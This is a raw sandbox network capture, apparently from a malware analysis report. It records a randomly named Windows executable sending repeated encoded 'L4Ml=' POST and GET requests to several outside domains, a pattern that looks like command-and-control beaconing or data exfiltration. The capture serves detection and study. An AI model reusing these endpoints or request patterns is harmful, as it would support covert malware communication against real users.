                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                    set-cookie: parking_session=d970db4c-46f4-4320-8e90-9392bdbc4515; expires=Tue, 24 Sep 2024 15:32:40 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:40.663424015 CEST  563  IN
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDk3MGRiNGMtNDZmNC00MzIwLThlOTAtOTM5MmJkYmM0NTE1IiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    4  192.168.2.8  63693  199.59.243.227  80  6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:17:42.695302010 CEST  458  OUT  GET /x7gz/?VX=XZGx-&L4Ml=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.popin.space
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:43.190362930 CEST  1236  IN  HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:42 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1466
                                                    x-request-id: 0476bd6b-8db3-4922-916e-d6ad22f4d4cf
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_E6IJMFHMuG7EMQj4Tz+0f+kQ5TM8YLEx4lyS/lQDmfvaPFJX3orONoWcc20GfGn0YiuWTRAfZqEDrEgpYf+u1w==
                                                    set-cookie: parking_session=0476bd6b-8db3-4922-916e-d6ad22f4d4cf; expires=Tue, 24 Sep 2024 15:32:43 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_E6IJMFHMuG7EMQj4Tz+0f+kQ5TM8YLEx4lyS/lQDmfvaPFJX3orONoWcc20GfGn0YiuWTRAfZqEDrEgpYf+u1w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:43.191807032 CEST  919  IN
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDQ3NmJkNmItOGRiMy00OTIyLTkxNmUtZDZhZDIyZjRkNGNmIiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    5  192.168.2.8  63697  198.252.106.191  80  6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:17:48.640113115 CEST  731  OUT  POST /tuad/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.suarahati20.xyz
                                                    Origin: http://www.suarahati20.xyz
                                                    Referer: http://www.suarahati20.xyz/tuad/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:49.272085905 CEST  1033  IN  HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:49 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    6  192.168.2.8  63698  198.252.106.191  80  6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:17:51.177927017 CEST  751  OUT  POST /tuad/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.suarahati20.xyz
                                                    Origin: http://www.suarahati20.xyz
                                                    Referer: http://www.suarahati20.xyz/tuad/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:51.768738031 CEST  1033  IN  HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:51 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    7  192.168.2.8  63699  198.252.106.191  80  6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:17:53.726007938 CEST  1768  OUT  POST /tuad/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.suarahati20.xyz
                                                    Origin: http://www.suarahati20.xyz
                                                    Referer: http://www.suarahati20.xyz/tuad/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:54.327126026 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:54 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.8 | 63700 | 198.252.106.191 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:17:56.291909933 CEST | 462 | OUT | GET /tuad/?L4Ml=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.suarahati20.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:56.930774927 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:56 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.8 | 63701 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:01.988341093 CEST | 716 | OUT | POST /u85y/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.dhkatp.vip
                                                    Origin: http://www.dhkatp.vip
                                                    Referer: http://www.dhkatp.vip/u85y/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=9Df5fTdg88KIFV6O9eXUawKIEwLX8NVAp0dDObFWIPGad8eCWTf9hqGQtLBRkhWT6TndAtA+7sV475ow+DL2U9Pch9/xCZgC+yWWzuIfuRBhMY5FUOh3yzL9mXpvkoJU19Fc6XuUnRv0BzsWf8V5xwUgSOeFcdvBdryx/i/BucOpe15VglFipPDtLY7wXmM0wpYh+Tk=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.8 | 63702 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:04.539994955 CEST | 736 | OUT | POST /u85y/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.dhkatp.vip
                                                    Origin: http://www.dhkatp.vip
                                                    Referer: http://www.dhkatp.vip/u85y/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=9Df5fTdg88KIH1qOu9PUYQKJagLX1tVEp0BDOaBGI9iaEduCXSf9mqGQ1bBU6RWY6SauAtM+7sB479gw+yL1VtPe0t//P5gC+yWWzqoluRZhMrhFTfh0xzL+hXpvgoJQ19Ez6SOynSH0BycWfph46wUmfufmZYDRVKiZ206ng8CcbDU/6HNkqPrGLbTGSRRcqKIRgEzw96/OF0odnFiDpEYuXUNs


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.8 | 63703 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:07.087567091 CEST | 1753 | OUT | POST /u85y/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.dhkatp.vip
                                                    Origin: http://www.dhkatp.vip
                                                    Referer: http://www.dhkatp.vip/u85y/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.8 | 63704 | 3.33.130.190 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:09.629841089 CEST | 457 | OUT | GET /u85y/?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.dhkatp.vip
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:10.103193045 CEST | 401 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Tue, 24 Sep 2024 15:18:10 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 261
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA=="}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.8 | 63705 | 148.251.114.233 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:15.231565952 CEST | 746 | OUT | POST /30vc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eslameldaramlly.site
                                                    Origin: http://www.eslameldaramlly.site
                                                    Referer: http://www.eslameldaramlly.site/30vc/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=pqjNF5PBwMCUp5etCYo5zpRvfr9RlacUVyyCBZZRCXrtRaB27tdkmJ2+BJPA6BoYW+pTWOxneVw0JR9KU9KzPPf6XTh++14Lw3ndZpJM56dhZnRFU+RL9ZMvmZhSEGTPiZuYZytE1RSWBj03T9EmBXAr9H9Y0jFEBYm2B6pfwqvVVxaAYDHPo+EM8yv8RVRbwrUXmf0=
                                                    Sep 24, 2024 17:18:15.912343979 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:15 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:15.912442923 CEST | 240 | IN
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.8 | 63706 | 148.251.114.233 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:17.979477882 CEST | 766 | OUT | POST /30vc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eslameldaramlly.site
                                                    Origin: http://www.eslameldaramlly.site
                                                    Referer: http://www.eslameldaramlly.site/30vc/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Ascii: L4Ml=pqjNF5PBwMCUpYutRpo5iZRwar9Rr6cQVyuCBYMJChbtR7x26opkjJ2+LpPF1hpUW+lhWOdneVU0JQtKVN2wNff0Djh8614Lw3ndZpNm5+xhYXhFVfRMhJMohZhSS2SniZu6Z2Nu1S6WBiE3UpQlKXAtzn8p624LIfqMCcsw/67QQH3qChPJr+sn8xHKUiMzqIEn4IgXS11mPv42RzYkOXKgEQ7I
                                                    Sep 24, 2024 17:18:18.520565033 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:18 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:18.520747900 CEST | 240 | IN
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.8 | 63707 | 148.251.114.233 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:18:20.599899054 CEST | 1783 | OUT | POST /30vc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eslameldaramlly.site
                                                    Origin: http://www.eslameldaramlly.site
                                                    Referer: http://www.eslameldaramlly.site/30vc/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:21.234181881 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:21 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:21.234220028 CEST  240                IN
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                    16          192.168.2.8  63708        148.251.114.233  80                6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp                             Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:18:23.145906925 CEST  467                OUT        GET /30vc/?L4Ml=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.eslameldaramlly.site
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:23.778836966 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:23 GMT
                                                    server: LiteSpeed
